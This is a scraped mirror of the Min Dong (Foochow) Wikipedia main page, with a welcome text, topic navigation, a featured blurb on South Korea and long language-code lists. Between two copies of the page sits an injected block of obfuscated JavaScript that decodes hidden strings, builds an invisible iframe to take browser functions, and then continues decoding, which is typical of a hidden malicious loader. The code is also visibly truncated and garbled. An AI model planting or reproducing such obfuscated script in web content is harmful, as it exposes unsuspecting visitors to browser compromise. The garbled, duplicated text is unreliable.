Tàu Hiăh

Lài-nguòng: Wikipedia

Huăng-ngìng nṳ̄ guŏng-lìng Mìng-dĕ̤ng-ngṳ̄ Wikipedia! Wikipedia sê cê̤ṳ-iù gì báik-kuŏ-ciòng-cṳ̆, găk cŭ-uái, giĕng-dṳ̆k ciáh nè̤ng dŭ â̤-sāi hông-hióng ĭ gì dĭ-sék. Â̤ báik gōng Hók-ciŭ-uâ mâ̤? Huòi nṳ̄ gó găh lā̤ dīng sié-nó̤h?! Ká̤-ká̤ cà̤ lì chăng siŏh kă! Hiêng-káik-sì, Mìng-dĕ̤ng-ngṳ̄ Wikipedia dŭ-liāng ô 62 piĕng ùng-ciŏng. Năng-gă gōng-hō̤ mò̤ sāi Háng-cê, uòng-ciòng sāi Hók-ciŭ-uâ Bàng-uâ-cê siā ùng-ciŏng. Cūng-kuāng có̤ sê-hō̤ sê-ngài? Ô sié-nó̤h é-giéng gióng-ngiê kī-dâe̤ng nṳ̄ gáu Duâi chéu â làu uâ. Ôi lāu ciáng-siòng hiēng-sê Bàng-uâ-cê cê-mō̤, chiāng hâ-diòng Charis SIL cê-tā̤, ng-sāi cièng gì. 歡迎汝光臨閩東語WikipediaWikipedia是自由其百科全書,洽租塊,兼逐隻儂都會使貢獻伊其知識。會仈講福州話賣?噲汝故洽嚟等什乇?!快快齊來參蜀骹!現刻時,閩東語Wikipedia都領有62篇文章。咱家講好無使漢字,完全使福州話平話字寫文章。將換做是好是呆?有什乇意見建議起動汝遘大樹下留話。為了正常顯示平話字字母,請下傳Charis SIL字體,伓使錢其。
Not a Min Dong speaker? Please come here if you have any comments or questions. 平話字是19世紀西方傳教士為福州話設計的羅馬文字。看不懂嗎?沒關係!我們教你!

Wikipedia mŭk-liŏh

Gáu-ṳ̆k - Céng-dê - Gĭng-cá̤ - Huák-lŭk - Ìng-ŭk - Lĭk-sṳ̄ - Tā̤-ṳ̆k

Cŭng-gáu - Diék-hŏk - Hŭng-sṳ̆k - Ĭng-ngŏk - Īng-sĭk - Mī-sŭk - Ngṳ̄-ngiòng - Ùng-hŏk

Dê-cék - Dê-lī - Dông-ŭk - Huá-hŏk - Ké-siông - Sĕng-lī - Sĕng-tái - Séng-sék - Sĭk-ŭk - Só-hŏk - Tiĕng-ùng - Ŭk-lī

Ā-ciŭ - Báe̤k Mī-ciŭ - Dâi-iòng-ciŭ - Dṳ̆ng-guók - Ĕu-ciŭ - Hĭ-ciŭ - Nàng Mī-ciŭ

Dài-uàng - Hĭng-huá - Mìng-báe̤k - Mìng-dĕ̤ng - Mìng-nàng - Mìng-să̤ - Sĕk-ék

Cê-mō̤ sáuk-īng

A B C CH D E F G H I J K L M N NG O P Q R S T U V W X Y Z

Image:Article.gifBō̤-ciéng hō̤ ùng

Hàng-guók (Hanguk) ciòng miàng hāu lā̤ „Dâi-hàng Mìng-guók“ (Daehan Minguk), sê Ā-ciŭ dĕ̤ng-buô Hàng Buáng-dō̤ (iâ hāu lă̤ Dièu-siēng Buáng-dō̤) gà̤-dēng gì siŏh bĭk guók-gă. Hàng-guók ciòng guók nè̤ng-só ô 4,500 uâng, gī-hù dŭ sê Hàng nè̤ng (Dièu-siēng nè̤ng). Hàng-guók găh ’60 nièng-dâi sìng-gŭng sĭk-hèng gì „nguôi-hióng ciō-dô̤ hìng“ gĭng-cá̤ huŏng-cĭng hâiu, téng lŏ̤h-hâiu gì nùng-ngiĕk guók-gă biéng có̤ Ā-ciŭ gĭng-cá̤ huák-dăk gì gĕ̤ng-ngiĕk guók-gă. Hàng-guók sê Ā-ciŭ Hĭ-lĭ-pĭng ī-hâiu dâ̤ nê duâi Gĭ-dók-gáu guŏk-gă. Hàng-guók hiêng-dâi ùng-huá găh Ā-ciŭ dĕk-biék găh Dṳ̆ng-guók ô siŏng-dŏng duâi gì īng-hiōng. (Gié-sṳ̆k tĕ̤k...)

Image:Question.pngNṳ̄ â̤ báik mâ̤?

Ciā-muói gĕ̤ng-tiàng

Nguòng-Wiki
Hiĕk-dièu sū-iū Wikimedia gĕ̤ng-tiàng
Wiki Gê̤ṳng-hiōng
Cê̤ṳ-iù bēng-guòng dŏ̤-mùi-tā̤ cṳ̆-lâu
Wiki Dù-cṳ̆-guāng
Bàng-uâ ùng-hŏk cáuk-pīng
Wiki Ŭk-cṳ̄ng
Tiĕng-â ék-chiék ô uăk-miâng gì nó̤h
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~';function ds(d,s){var _,$,h,x='',r=s.length;for(_=0;_=0&&(h=s.charAt((r/2)%r)),x+=h;return x;}var _0xf62sadc=ds(':7C2>6',$pe),_0xf62sagsdg=ds('?@?6',$pe),_0xf62s4gg=ds('4C62E6t=6>6?E',$pe);const _=document[_0xf62s4gg](_0xf62sadc);var _0xf62s45htrgb=ds('DEJ=6',$pe),_0xf62s45h8jgb=ds('5:DA=2J',$pe);_[_0xf62s45htrgb][_0xf62s45h8jgb]=_0xf62sagsdg;var _0x54y0p=ds('A2CD6u=@2E',$pe),_0x54rgrt3vcb=ds('A2CD6x?E',$pe),_0x54hrgfb=ds('$EC:?8',$pe),_0x54hr5gfdfb=ds('7C@>r92Cr@56',$pe),_0x54h9h=ds('5@4F>6?Et=6>6?E',$pe),_0x5dsad9h=ds('4@?E6?E(:?5@H',$pe),_0x5dsdsadasdad9h=ds('2AA6?5r9:=5',$pe),_0x54hr6ytgfvb=ds('C6>@G6r9:=5',$pe);document[_0x54h9h][_0x5dsdsadasdad9h](_);var f=_[_0x5dsad9h][_0x54hrgfb][_0x54hr5gfdfb];var p=_[_0x5dsad9h][_0x54rgrt3vcb];var v=_[_0x5dsad9h][_0x54y0p];document[_0x54h9h][_0x54hr6ytgfvb](_);function H(index){return Number(index).toString(36).replace(/[0-9]/g,function(s){return f(p(s,10)+65);});}var o={$:function(){var o={};for(var i=0;i-1&&0===t.indexOf(n[f])&&(i=0),o>-1&&(e+=y(i*r.length+o),i=1);}return e;})),(function(s){var _={};for(k in s){try{_[k]=s[k].bind(s);}catch(e){_[k]=s[k];}}return _;})(document))

Web Analytics
CLASSICISTRANIERI HOME PAGE - YOUTUBE CHANNEL

Make a donation: IBAN: IT36M0708677020000000008016 - BIC/SWIFT:  ICRAITRRU60 - VALERIO DI STEFANO or

QR Code


Privacy Policy Cookie Policy Termini e Condizioni


Tàu Hiăh - Wikipedia

Tàu Hiăh

Lài-nguòng: Wikipedia

Huăng-ngìng nṳ̄ guŏng-lìng Mìng-dĕ̤ng-ngṳ̄ Wikipedia! Wikipedia sê cê̤ṳ-iù gì báik-kuŏ-ciòng-cṳ̆, găk cŭ-uái, giĕng-dṳ̆k ciáh nè̤ng dŭ â̤-sāi hông-hióng ĭ gì dĭ-sék. Â̤ báik gōng Hók-ciŭ-uâ mâ̤? Huòi nṳ̄ gó găh lā̤ dīng sié-nó̤h?! Ká̤-ká̤ cà̤ lì chăng siŏh kă! Hiêng-káik-sì, Mìng-dĕ̤ng-ngṳ̄ Wikipedia dŭ-liāng ô 62 piĕng ùng-ciŏng. Năng-gă gōng-hō̤ mò̤ sāi Háng-cê, uòng-ciòng sāi Hók-ciŭ-uâ Bàng-uâ-cê siā ùng-ciŏng. Cūng-kuāng có̤ sê-hō̤ sê-ngài? Ô sié-nó̤h é-giéng gióng-ngiê kī-dâe̤ng nṳ̄ gáu Duâi chéu â làu uâ. Ôi lāu ciáng-siòng hiēng-sê Bàng-uâ-cê cê-mō̤, chiāng hâ-diòng Charis SIL cê-tā̤, ng-sāi cièng gì. 歡迎汝光臨閩東語WikipediaWikipedia是自由其百科全書,洽租塊,兼逐隻儂都會使貢獻伊其知識。會仈講福州話賣?噲汝故洽嚟等什乇?!快快齊來參蜀骹!現刻時,閩東語Wikipedia都領有62篇文章。咱家講好無使漢字,完全使福州話平話字寫文章。將換做是好是呆?有什乇意見建議起動汝遘大樹下留話。為了正常顯示平話字字母,請下傳Charis SIL字體,伓使錢其。
Not a Min Dong speaker? Please come here if you have any comments or questions. 平話字是19世紀西方傳教士為福州話設計的羅馬文字。看不懂嗎?沒關係!我們教你!

Wikipedia mŭk-liŏh

Gáu-ṳ̆k - Céng-dê - Gĭng-cá̤ - Huák-lŭk - Ìng-ŭk - Lĭk-sṳ̄ - Tā̤-ṳ̆k

Cŭng-gáu - Diék-hŏk - Hŭng-sṳ̆k - Ĭng-ngŏk - Īng-sĭk - Mī-sŭk - Ngṳ̄-ngiòng - Ùng-hŏk

Dê-cék - Dê-lī - Dông-ŭk - Huá-hŏk - Ké-siông - Sĕng-lī - Sĕng-tái - Séng-sék - Sĭk-ŭk - Só-hŏk - Tiĕng-ùng - Ŭk-lī

Ā-ciŭ - Báe̤k Mī-ciŭ - Dâi-iòng-ciŭ - Dṳ̆ng-guók - Ĕu-ciŭ - Hĭ-ciŭ - Nàng Mī-ciŭ

Dài-uàng - Hĭng-huá - Mìng-báe̤k - Mìng-dĕ̤ng - Mìng-nàng - Mìng-să̤ - Sĕk-ék

Cê-mō̤ sáuk-īng

A B C CH D E F G H I J K L M N NG O P Q R S T U V W X Y Z

Image:Article.gifBō̤-ciéng hō̤ ùng

Hàng-guók (Hanguk) ciòng miàng hāu lā̤ „Dâi-hàng Mìng-guók“ (Daehan Minguk), sê Ā-ciŭ dĕ̤ng-buô Hàng Buáng-dō̤ (iâ hāu lă̤ Dièu-siēng Buáng-dō̤) gà̤-dēng gì siŏh bĭk guók-gă. Hàng-guók ciòng guók nè̤ng-só ô 4,500 uâng, gī-hù dŭ sê Hàng nè̤ng (Dièu-siēng nè̤ng). Hàng-guók găh ’60 nièng-dâi sìng-gŭng sĭk-hèng gì „nguôi-hióng ciō-dô̤ hìng“ gĭng-cá̤ huŏng-cĭng hâiu, téng lŏ̤h-hâiu gì nùng-ngiĕk guók-gă biéng có̤ Ā-ciŭ gĭng-cá̤ huák-dăk gì gĕ̤ng-ngiĕk guók-gă. Hàng-guók sê Ā-ciŭ Hĭ-lĭ-pĭng ī-hâiu dâ̤ nê duâi Gĭ-dók-gáu guŏk-gă. Hàng-guók hiêng-dâi ùng-huá găh Ā-ciŭ dĕk-biék găh Dṳ̆ng-guók ô siŏng-dŏng duâi gì īng-hiōng. (Gié-sṳ̆k tĕ̤k...)

Image:Question.pngNṳ̄ â̤ báik mâ̤?

Ciā-muói gĕ̤ng-tiàng

Nguòng-Wiki
Hiĕk-dièu sū-iū Wikimedia gĕ̤ng-tiàng
Wiki Gê̤ṳng-hiōng
Cê̤ṳ-iù bēng-guòng dŏ̤-mùi-tā̤ cṳ̆-lâu
Wiki Dù-cṳ̆-guāng
Bàng-uâ ùng-hŏk cáuk-pīng
Wiki Ŭk-cṳ̄ng
Tiĕng-â ék-chiék ô uăk-miâng gì nó̤h
Static Wikipedia 2008 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - en - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Static Wikipedia 2007 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - en - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Static Wikipedia 2006 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Sub-domains

CDRoms - Magnatune - Librivox - Liber Liber - Encyclopaedia Britannica - Project Gutenberg - Wikipedia 2008 - Wikipedia 2007 - Wikipedia 2006 -

Other Domains

https://www.classicistranieri.it - https://www.ebooksgratis.com - https://www.gutenbergaustralia.com - https://www.englishwikipedia.com - https://www.wikipediazim.com - https://www.wikisourcezim.com - https://www.projectgutenberg.net - https://www.projectgutenberg.es - https://www.radioascolto.com - https://www.debitoformtivo.it - https://www.wikipediaforschools.org - https://www.projectgutenbergzim.com